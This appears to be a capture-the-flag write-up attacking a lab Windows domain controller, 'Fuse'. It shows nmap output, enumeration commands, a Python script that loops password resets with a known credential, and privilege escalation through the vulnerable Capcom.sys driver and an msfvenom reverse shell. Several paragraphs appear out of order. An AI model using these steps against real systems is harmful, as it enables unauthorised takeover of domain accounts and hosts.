PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html).
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-01-07 23:36:40Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
445/tcp open ▒�h��U Windows Server 2016 Standard 14393 microsoft-ds (workgroup: FABRICORP)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49677/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49678/tcp open msrpc Microsoft Windows RPC
49679/tcp open msrpc Microsoft Windows RPC
49702/tcp open msrpc Microsoft Windows RPC
49708/tcp open msrpc Microsoft Windows RPC
Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h52m08s, deviation: 4h37m09s, median: 12m07s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-time:
| date: 2024-01-07T23:37:32
|_ start_date: 2024-01-07T23:30:39
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Fuse
| NetBIOS computer name: FUSE\x00
| Domain name: fabricorp.local
| Forest name: fabricorp.local
| FQDN: Fuse.fabricorp.local
|_ System time: 2024-01-07T15:37:31-08:00
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.46 seconds
what we can see
Most likely a domain controller given the presence of DNS, Kerberos, ldap etc
Windows server 2016
domain name: fabricorp.local we can add this to our hosts file
Hosts name: FUSE
Lets see if we can perform a zone transfer since Port 53 (DNS) is present
dig @10.10.10.193 fabricorp.local AXFR
No luck
Lets test for anonymous authentication among the services
SMB
crackmapexec smb 10.10.10.193 -u anonymous -p ''
No luck
LDAP
ldapsearch -x -H ldap://10.10.10.193 -s sub -b "DC=fabricorp,DC-local" "(ObjectClass=person)"
No luck
RPC
rpcclient -N -U anonymous 10.10.10.193
No luck
Lets try the web Server
when we do and try and access the page again we can see the following
Looking att the print logs we can see a couple of username's on the system
pmerton
tlavel
sthompson
bhult
administrator
other then usernames i cant really find any other peices of interesting information, and we need a set of working creds to progress so we can utilise cewl to build a wordlist we could use with the usernames we have found
tried to authenticate to a few services, but no luck
if we look back at the image above we can see the message STATUS_PASSWORD_MUST_CHANGE , meaning we do have valid credentials but they are expired, we could try and reset the password using a tool like smbpasswd
Now we just need to create a password that matches the Password complexity
shrek123!
It seems the password expires after 1 minute from creation, wat we can do is write a basic python script that will automate the password change process
import subprocess
import random
import string
def gen_password(length=9):
chars = string.ascii_letters + string.digits + string.punctuation
password = ''.join(random.choice(chars) for i in range(length))
return password
def escape_password(password):
# Escape special characters in the password
return password.replace('"', r'\"').replace("'", r"\'")
def Grabitall():
new_password = gen_password()
escaped_pass = escape_password(new_password)
change_pass = [
'/usr/bin/impacket-smbpasswd',
'fabricorp/tlavel:Fabricorp01@10.10.10.193',
'-newpass',
escaped_pass
]
try:
#running the command
result = subprocess.run(change_pass, check=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
#checking if trhe command was successful (exit code is zero)
if result.returncode == 0:
print(f"{new_password}")
else:
print("Password change failed")
print(f'Command output {result.stderr}')
except subprocess.CalledProcessError as e:
print(f'the following error has occured {e}')
print(f"Command output {result.stderr}")
Grabitall()
Now that we have our automation script, we can continue enumerating
After we have downloaded the tool (essentially a single c++ file) Let's start a new project in VS , at the window, we will choose the C++ Console App
Note: when creating a new project and specifying the project template "Console App" you may run into an error when creating the project, to fix this go to the visual studio installer
click 'Modify' and download the 'Desktop development with C++'
After this is installed we should be able to specify the Console App template without error
alright back to compiling the eopladdriver.cpp
lets start a new project
click 'Next'
In the next window we can specify the name of our new project
here we can specify the name of the project (you can name it whatever you want)
Looking in the project we can see a basic hello world project
Now we can replace the code within EoPloadDriver.cpp code below
after we have copy and paste the code, we can set the project to 'Release' and 'x64'
then we select 'Build' -> 'Build Solution'
Note: we receive and error with the line include "stdafx.h" we can just remove it and it will build
now we should be able to see the .exe file within the specified file path
Now we can transfer this over to our linux machine
for this i will start a python HTTP server on my windows machine
python.exe -m http.server 80
from our linux machine
wget http://<windows_ip>/EoPLoadDriver.exe
Now we can upload it to the target machine
upload EoPLoadDriver.exe
We also need to upload the Capcom.sys
upload Capcom.sys
Now that we have the vulnerable driver and the loader to the target machine, we can run same command we saw in the blog post
it looks like it has worked no error, but we dont have the permissions if the driver is actually running
Next we need to build the actual exploit for our vulnerable driver, we can use the following code
Since this is a .sln file we will need to utilise visual studio on our windows machine, after we have cloned the repo we can simply double click on the ExploitCapcom.sln file
Lets build the project to see if an error occur before we modify the code
No errors, ready for us to modify the code slightly, if we look at the LaunchShell function we can see the following
this just open a cmd prompt, but since we only have remote access to the machine this is pretty pointless, what we will do is generate a reverse-shell with msfvenom and drop that on the system, instead of the function executing cmd.exe we are going to make it execute shrek123.exe our reverse-shell
when we try to navigate to http://fabrcorp.local we are redirected to ` Lets add the subdomain fuse to our subdomain
We will need to compile a few .exe files for the following attack, the best way to compile .exe files would be in a Windows VM. To load the vulnerable driver capcom.sys we will use the following tool from Tarlogic security
